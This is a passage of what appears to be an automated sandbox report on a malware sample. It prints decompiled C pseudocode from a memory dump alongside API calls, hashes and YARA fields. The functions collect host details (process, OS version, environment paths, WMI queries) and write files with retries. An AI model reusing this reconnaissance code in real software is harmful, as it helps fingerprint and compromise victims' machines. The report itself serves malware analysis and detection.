						_v24 = _t38;
						_push(_t67);
						_push(_t38);
						_t39 =  *0x9e688; // 0xb0000
						_push(_t67);
						_v20 = E000892E5(_t39 + 0x1020);
						_t42 = E0008A6A9( &_v8, _t41,  &_v8); // executed
						_v16 = _t42;
						E000885D5( &_v24);
						E000885D5( &_v20);
						_t73 = _v16;
						_t82 = _t81 + 0x3c;
						_t69 = _v8;
						if(_v16 != 0 && _t69 > 0x400) {
							_t51 =  *0x9e654; // 0x28dfd30
							_t52 =  *((intOrPtr*)(_t51 + 4));
							_t53 =  <  ? _t69 : _t52;
							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
							E000886E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
							_t69 = _v8;
							_t82 = _t82 + 0xc;
						}
						E0008861A( &_v16, _t69);
						E0008861A( &_v20, 0xfffffffe);
						_t27 = _v12;
						_t81 = _t82 + 0x10;
						_t63 =  *0x9e654; // 0x28dfd30
					}
					_t78 = 0;
					while(1) {
						_t29 =  *0x9e688; // 0xb0000
						_t31 = E0008A77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
						_t81 = _t81 + 0xc;
						if(_t31 >= 0) {
							break;
						}
						Sleep(1);
						_t78 = _t78 + 1;
						if(_t78 < 0x2710) {
							_t27 = _v12;
							_t63 =  *0x9e654; // 0x28dfd30
							continue;
						}
						break;
					}
					E0008861A( &_v12, 0);
				}
				return 0;
			}

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0008F8B5,?,?,?,0008FCB9,00000000), ref: 0008FAEC

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeapSleep
String ID:
API String ID: 4201116106-0
Opcode ID: cdf69c011c3f0dff7289e14524af5fe512b685270e54bb2f23f5427f4524044f
Instruction ID: 732f9496a7e373a88c7c7ec427939724ae18ee305fc23bc779ce3543d22a3d2a
Opcode Fuzzy Hash: cdf69c011c3f0dff7289e14524af5fe512b685270e54bb2f23f5427f4524044f
Instruction Fuzzy Hash: EA417CB2A00104ABEB04FBA4DD85EAE77BDFF54310B14407AF545E7242EB38AE15CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00085D7D, Relevance: 1.3, APIs: 1, Instructions: 49
stringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00085D7D(void* __eflags) {
				char _v44;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;
				WCHAR* _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t27;
				WCHAR* _t28;

				_t7 =  *0x9e688; // 0xb0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
				_t10 =  *0x9e684; // 0x28df8f0
				_t28 = 2;
				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
				if(_t11 == 0) {
					_t22 =  *0x9e688; // 0xb0000
					_t12 = E00085974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
					 *0x9e6ac = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E00089EBB();
						__eflags = _t14;
						if(_t14 == 0) {
							_t28 = 0;
							__eflags = 0;
						} else {
							_t15 =  *0x9e688; // 0xb0000
							lstrcmpiW(_t15 + 0x228, _t14);
							asm("sbb esi, esi");
							_t28 = _t28 + 1;
						}
					}
					_t13 = _t28;
				} else {
					_t19 =  *0x9e684; // 0x28df8f0
					 *((intOrPtr*)(_t19 + 0x30))(_t11);
					_t13 = 3;
				}
				return _t13;
			}

APIs

lstrcmpiW.KERNEL32(000AFDD8,00000000), ref: 00085DF2

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
Instruction ID: 4fec7bbb8dec9b8e29c5d3869e1073f411c91b91cf4618315680d6859f46272f
Opcode Fuzzy Hash: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
Instruction Fuzzy Hash: 0701D431300611DFF754FBA9DC49F9A33E8BB58381F094022F542EB2A2DA60DC00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0008BA05, Relevance: 1.3, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008BA05() {
				signed int _v8;
				signed int _v12;
				intOrPtr _t15;
				void* _t16;
				void* _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t30;

				_v8 = _v8 & 0x00000000;
				_t15 =  *0x9e68c; // 0x28dfab8
				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
				if(_t16 != 0) {
					_v12 = _v12 & 0x00000000;
					_t18 = E0008B998(1,  &_v12); // executed
					_t30 = _t18;
					if(_t30 != 0) {
						CloseHandle(_v8);
						_t21 = _t30;
					} else {
						if(_v8 != _t18) {
							_t22 =  *0x9e684; // 0x28df8f0
							 *((intOrPtr*)(_t22 + 0x30))(_v8);
						}
						_t21 = 0;
					}
					return _t21;
				} else {
					return _t16;
				}
			}

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
Instruction ID: c4d0144dd0226c5aba2f7410e7a6f6ad075efd4050d4223f465ea27968045e4c
Opcode Fuzzy Hash: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
Instruction Fuzzy Hash: 13F03732A10208EFEF64EBA4CD4AAAE77F8FB54399F1140A9F141E7151EB74DE009B51

Uniqueness

Uniqueness Score: -1.00%

Function 0008861A, Relevance: 1.3, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008861A(int _a4, intOrPtr _a8) {
				int _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E0008C392(_t9);
						}
					} else {
						_t4 = E0008C379(_t9);
					}
					E0008874F(_t9, 0, _t4);
					_t3 = HeapFree( *0x9e768, 0, _t9); // executed
				}
				return _t3;
			}

APIs

HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
Instruction ID: a28974b748b9f8cdd91a2a14d7a9ce437aea9645c05ed6ae8ab8bbe52d99dc9a
Opcode Fuzzy Hash: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
Instruction Fuzzy Hash: A4F0E5315016246FEA607A24EC01FAE3798BF12B30FA4C211F854EB1D1EF31AD1187E9

Uniqueness

Uniqueness Score: -1.00%

Function 0008A77D, Relevance: 1.3, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008A77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				long _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E0008A5F7(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E0008A65C(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						CloseHandle(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}

0x0008a786
0x0008a787
0x0008a78c
0x0008a790
0x0008a79f
0x0008a7a7
0x0008a7b4
0x00000000
0x0008a7b7
0x0008a7ab
0x00000000
0x0008a7ab
0x00000000

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
Instruction ID: 663aae789e914c9616d0efe74e5f130c4bdd51193654dc020258e593981ed1c8
Opcode Fuzzy Hash: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
Instruction Fuzzy Hash: 14E02236308A256BAB217A689C5099E37A4BF0A7707200213F9658BAC2DA30D84193D2

Uniqueness

Uniqueness Score: -1.00%

Function 0008B337, Relevance: 1.3, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0008B337(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0x9e684; // 0x28df8f0
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0x9e684; // 0x28df8f0
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
						_t13 = 1;
					}
					CloseHandle(_t12);
					return _t13;
				}
				return _t5;
			}

0x0008b337
0x0008b33f
0x0008b344
0x0008b34a
0x0008b34e
0x0008b350
0x0008b355
0x0008b35e
0x0008b362
0x0008b362
0x0008b36a
0x00000000
0x0008b36d
0x0008b371

APIs

CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
Instruction ID: 8fe01f62ba4c39ee7338d5a8f0e8a0c9642a3c10550f89b54f48b15bd4262c2d
Opcode Fuzzy Hash: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
Instruction Fuzzy Hash: 15E04F33300120ABD6609B69EC4CF677BA9FBA6A91F060169F905C7111CB248C02C7A1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0008D01F, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0008D01F(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x9e69c; // 0x10000000
				_t81 = E00088604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x9e684; // 0x28df8f0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E00092301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E00088FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E0008BA05();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E0008BB8D( *_t88) == 0) {
					_t90 = E0008BA62(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E0008E3F1(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E0008E3B6(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0x9e68c; // 0x28dfab8
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0x9e694; // 0x28dfa48
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E00088FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E0008B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E0008B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E00088FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E0008D400(_t43, E0008C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E0008B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E0008BBDF(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x9e684; // 0x28df8f0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E000895E1(_t199, 0x10c);
				_t200 =  *0x9e684; // 0x28df8f0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x9e684; // 0x28df8f0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E000885D5( &_v8);
				_t124 =  *0x9e684; // 0x28df8f0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E00089640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x9e684; // 0x28df8f0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x9e684; // 0x28df8f0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x9e684; // 0x28df8f0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x9e684; // 0x28df8f0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x9e684; // 0x28df8f0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x9e684; // 0x28df8f0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E00092301(E0008D400(_t75, E0008C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E000922D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E0008902D(1, _t79, 0x14, 0x1e,  &_v2680);
				 *((intOrPtr*)(_t222 + 0x1898)) = E0008CD33(_t79);
				return _t222;
			}

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

GetCurrentProcessId.KERNEL32 ref: 0008D046
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0008D082
GetCurrentProcess.KERNEL32 ref: 0008D09F
GetLastError.KERNEL32 ref: 0008D13E
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0008D16C
GetLastError.KERNEL32 ref: 0008D172
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0008D1C7
GetCurrentProcess.KERNEL32 ref: 0008D20E
memset.MSVCRT ref: 0008D229
GetVersionExA.KERNEL32(00000000), ref: 0008D234
GetCurrentProcess.KERNEL32(00000100), ref: 0008D24E
GetSystemInfo.KERNEL32(?), ref: 0008D26A
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0008D287

Strings

TEMP, xrefs: 0008D2F3
%s\%s, xrefs: 0008D2F9
SystemDrive, xrefs: 0008D353, 0008D35E, 0008D373
TEMP, xrefs: 0008D328, 0008D333, 0008D344
USERPROFILE, xrefs: 0008D2E4, 0008D312

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 3876402152-2706916422
Opcode ID: 0da35a10afc6bcadec3f4ad10f45e6bf3f3245d2d58503743572c6aa095a296a
Instruction ID: 25e8395d91437c6831676a43eef48ae52fba165dceb8ee9639bfc079f816c02c
Opcode Fuzzy Hash: 0da35a10afc6bcadec3f4ad10f45e6bf3f3245d2d58503743572c6aa095a296a
Instruction Fuzzy Hash: 77B16071600704AFE750EB70DD89FEA77E8BF58300F00456AF59AD7292EB74AA04CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0008DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0008DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0008D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E00088604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E0008861A( &_v60, 0xfffffffe);
					E0008D5D7( &_v104);
					return _t320;
				}
				_t165 = E000895E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E000895E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E000892E5(_t165);
				_v60 = _t322;
				E000885D5( &_v52);
				E000885D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E000895E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E000885D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E0008861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E000891E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E000891E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E00088698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00088604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E0008861A(_t136, 0);
								E0008861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E000891E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E000895E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E000895E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E000885D5( &_v92);
											E000885D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E00089640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E000895E1(_t283, 0x219);
										E00089640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E000885D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E000891E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0008DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E0008861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

APIs

Part of subcall function 0008D523: CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
Part of subcall function 0008D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
Part of subcall function 0008D523: CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
Part of subcall function 0008D523: SysAllocString.OLEAUT32(00000000), ref: 0008D569
Part of subcall function 0008D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594

